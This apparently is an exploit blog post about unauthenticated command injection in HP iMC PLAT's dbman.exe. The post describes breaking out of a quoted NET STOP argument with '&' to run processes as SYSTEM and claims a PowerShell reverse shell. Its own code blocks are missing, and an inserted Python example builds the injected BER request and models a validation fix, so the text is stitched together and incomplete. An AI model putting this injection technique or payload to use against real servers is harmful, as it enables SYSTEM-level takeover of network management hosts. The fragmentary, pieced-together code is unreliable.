Hey there, hope you're enjoying oxasploits! Need a secure server setup, code review, vulnerability assessment, or a general technical consultation? You can hire me!
Background
dbman.exe, a module of HP iMC PLAT 7.3 that listens on TCP/2810, has a handler that restarts some network services; while doing so it runs NET STOP with an IP address taken from an ASN.1 BER-encoded request. Because of multiple weaknesses in dbman, you can send a BER-encoded request carrying dummy credentials whose IP address field is never sanitized: the value is treated as an IP address but never checked to contain an IP address and nothing else. Since that value is spliced into a quoted command line, we simply close the quote and use cmd.exe's & separator to chain any process we want, which dbman then spawns in its own (SYSTEM) context. It is important to note that no authentication with dbman is required to exploit this.
PoC
The first problem was generating the opcode and the ASN.1 length field (which dbman uses to size its allocation) dynamically, so that both stay correct as the payload length changes. This can be done with pack and sprintf in Perl:
The problem needing a little more effort was figuring out what ASN.1 BER-encoded data dbman will accept. We know it is ASN.1 BER because the calls to the decoding function are visible in OllyDbg. After days of trying online BER encoding tools (BER allows several valid encodings of the same structure, and without the schema the exact layout had to be inferred), it was back to the drawing board to generate the encoding from Perl like so:
So now we have:
Which will generate our payload, which can be as simple as calc.exe. It's important to note that when calc pops, it will be running as SYSTEM in dbman's service session, so it is unlikely to show up on your GUI user's desktop; confirm it with tasklist /v, which lists calc.exe under NT AUTHORITY\SYSTEM. That is exactly what we want here.
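As an added example (not the post's own Perl PoC, and written in Python rather than Perl so it runs as-is): a minimal BER encoder that builds a request with dummy credentials and the injected IP field, followed by a model of dbman's unvalidated command build and the hardened check beside it. The 8-byte opcode/length header, the opcode value, the SEQUENCE-of-OCTET-STRING field order (user, password, ip) and the exact shape of the NET STOP command line are assumptions made for illustration, not dbman's real wire format.

```python
"""Added example: BER-encode a dbman-style restart request with an injected
ip field, then model the vulnerable and the hardened server-side handling.
Header layout, opcode value, field order and command shape are ASSUMED."""
import ipaddress
import struct

OCTET_STRING = 0x04
SEQUENCE = 0x30
OPCODE_RESTART = 0x0A  # hypothetical opcode, not dbman's real value


def ber_length(n):
    """BER definite length: short form below 128, long form 0x80|N then N bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_tlv(tag, value):
    """One tag-length-value element."""
    return bytes([tag]) + ber_length(len(value)) + value


def build_request(user, password, ip_field, opcode=OPCODE_RESTART):
    """Dummy credentials plus the attacker-controlled ip field (assumed layout)."""
    seq = ber_tlv(SEQUENCE,
                  ber_tlv(OCTET_STRING, user.encode())
                  + ber_tlv(OCTET_STRING, password.encode())
                  + ber_tlv(OCTET_STRING, ip_field.encode()))
    # Assumed header: big-endian opcode and body length, computed from the
    # real body so it stays correct whatever size the payload grows to.
    return struct.pack(">II", opcode, len(seq)) + seq


def parse_tlv(buf, pos=0):
    """Decode one TLV at buf[pos]; returns (tag, value, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_sequence(value):
    """Decode the children of a constructed element into (tag, value) pairs."""
    items, pos = [], 0
    while pos < len(value):
        tag, val, pos = parse_tlv(value, pos)
        items.append((tag, val))
    return items


def extract_fields(packet):
    """Server side: header, then the SEQUENCE's octet strings as text."""
    _opcode, length = struct.unpack(">II", packet[:8])
    _tag, seq, _end = parse_tlv(packet[8:8 + length])
    return [v.decode() for _t, v in parse_sequence(seq)]


def vulnerable_command(packet):
    """Model of the flaw: credentials are never checked and the ip field is
    dropped into a quoted argument without validation (assumed shape)."""
    _user, _password, ip = extract_fields(packet)
    return 'NET STOP "%s"' % ip


def hardened_command(packet):
    """Fix: accept the field only if it parses as an IP address, else refuse."""
    _user, _password, ip = extract_fields(packet)
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return None
    return 'NET STOP "%s"' % ip


def cmd_pieces(cmdline):
    """Split as cmd.exe does: '&' separates commands unless inside quotes."""
    pieces, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            pieces.append(cur.strip())
            cur = ""
        else:
            cur += ch
    pieces.append(cur.strip())
    return pieces


if __name__ == "__main__":
    pkt = build_request("admin", "dummy", '10.0.0.1" & calc.exe & "')
    print(pkt.hex())
    print(cmd_pieces(vulnerable_command(pkt)))   # calc.exe becomes its own command
    print(hardened_command(pkt))                 # None: rejected
```

The injected field closes the quote, appends `& calc.exe &`, and reopens the quote so the trailing `"` dbman adds still pairs up; `cmd_pieces` shows that cmd.exe then sees three separate commands. The long-form length path matters in practice because a real payload easily exceeds 127 bytes.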
Exploitation
From here, it's as simple as plugging the reverse shell code into $payload. Note: this payload only works if KB976932 (the Windows 7 / Server 2008 R2 SP1 update) and .NET Framework 4.5 are installed on the exploited host, because the PowerShell payload depends on them.
I ran it through a little data2c_hex.sh program, and added some spaces to get alignment correct.
Which leaves us with the final weaponized version:
SYSTEM-level PowerShell reverse shell achieved. Game over.